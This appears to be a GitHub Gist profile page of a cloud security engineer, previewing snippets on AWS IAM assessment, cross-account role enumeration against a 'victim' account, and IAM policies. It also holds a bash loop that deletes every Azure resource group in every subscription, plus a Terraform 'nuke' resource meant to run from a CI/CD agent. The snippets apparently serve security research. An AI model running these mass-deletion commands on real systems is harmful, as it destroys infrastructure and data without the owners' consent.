Skip to content

Instantly share code, notes, and snippets.


Kinnaird McQuade kmcquade

View GitHub Profile
kmcquade /
Created Mar 14, 2021
Revised script for Kittoh
from jira import JIRA
import click
import getpass
ISSUE_SUMMARY = "Overly permissive AWS IAM Policies in use"
ISSUE_DESCRIPTION = """As part of our security assessment, our team ran Cloudsplaining on your AWS account.
Cloudsplaining maps out the IAM risk landscape in a report, identifies where resource ARN constraints are not used, and
identifies other risks in IAM policies like Privilege Escalation, Data Exfiltration, and Resource Exposure.
View resume.json
"basics": {
"email": "",
"image": "\u0026u=3aa6c1944134c93d3eb1500028e54826ce561f7f\u0026v=4",
"label": "Lead Security Engineer",
"location": {
"city": "San Francisco",
"countryCode": "US",
"region": "California"

This only works when you have the victim account ID. For this example, let's say that the victim account ID is 999988887777.

Create a test role

First, create a role that we can use for this demo. This role is in your own account.

aws iam create-role --role-name test-enumeration \
    --assume-role-policy-document '{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": {"Service": ""},"Action": "sts:AssumeRole"}]}'
View compliance_statuses.csv
a4b Alexa for Business true
access-analyzer IAM Access Analyzer
account AWS Accounts true true true true true true true true true
acm AWS Certificate Manager true true true true true true true true true
acm-pca AWS Certificate Manager Private Certificate Authority
activate AWS Activate
airflow Amazon Managed Workflows for Apache Airflow
amplify AWS Amplify true true true true true true
amplifybackend AWS Amplify Admin true true true true true true
kmcquade /
Created Jan 9, 2021
git clones a repository into $HOME/Code/ and then opens it in Pycharm, all in one command
#!/usr/bin/env python3
# git clones a repository into $HOME/Code/ and then open it in Pycharm, all in one command
# Example:
""" -u
# This will create $HOME/Code/
import os
import subprocess
import argparse
  • To list all dependencies:
go list std | tr -d "\[|\]" | tr " " "\n" | sort -u > std-library
go list -f {{.Deps}} | tr -d "\[|\]" | tr " " "\n" | sort -u > all-dependencies
sort std-library std-library all-dependencies | uniq -u


kmcquade / ecr-registry-enforcement.json
Last active Dec 14, 2020
The Policy below prevents the account from self-managing container images. Users and Roles in the account cannot upload any container images unless the registry is owned by an approved ECR account ID.
View ecr-registry-enforcement.json
"Version": "2012-10-17",
"Statement": [
"Sid": "PreventSelfManagedImages",
"Action": [
kmcquade /
Last active Nov 5, 2020
Nuke every Azure resource group in every Azure subscription
#!/usr/bin/env bash
for sub in `az account list | jq -r '.[].id'`; do \
for rg in `az group list --subscription $sub | jq -r '.[].name'`; do \
az group delete --name ${rg} --subscription $sub --no-wait --yes; \
done; done;
kmcquade /
Last active Oct 30, 2020
Explanation: Recursively nuke things from a CICD build agent running Terraform with Azure God mode permissions
resource "null_resource" "nuke" {
# Because we set this to timestamp, it *always* runs :D
triggers = {
party_like_its_jan_1_1970 = timestamp()
provisioner "local-exec" {
# Pseudocode for some bash magic that:
# 1. gets a list of all subscriptions
# 2. For each subscription, list the resource groups
kmcquade / input-serverless-iam-user.yml
Last active Oct 30, 2020
Policy Sentry template to deploy full stack serverless app (Lambda functions, API Gateway, CloudFront distribution, and S3 objects)cat
View input-serverless-iam-user.yml
mode: crud
name: 'ServerlessAppDeployAutomationUser'
# Specify resource ARNs
- 'arn:aws:execute-api:*:*:*/*/*/*'
- 'arn:aws:lambda:*:*:function:cloudsplaining-*'
- 'arn:aws:s3:::cloudsplaining-serverless-*/*'
- 'arn:aws:cloudfront::*:distribution/mydistributionid'
- 'arn:aws:execute-api:*:*:*/*/*/*'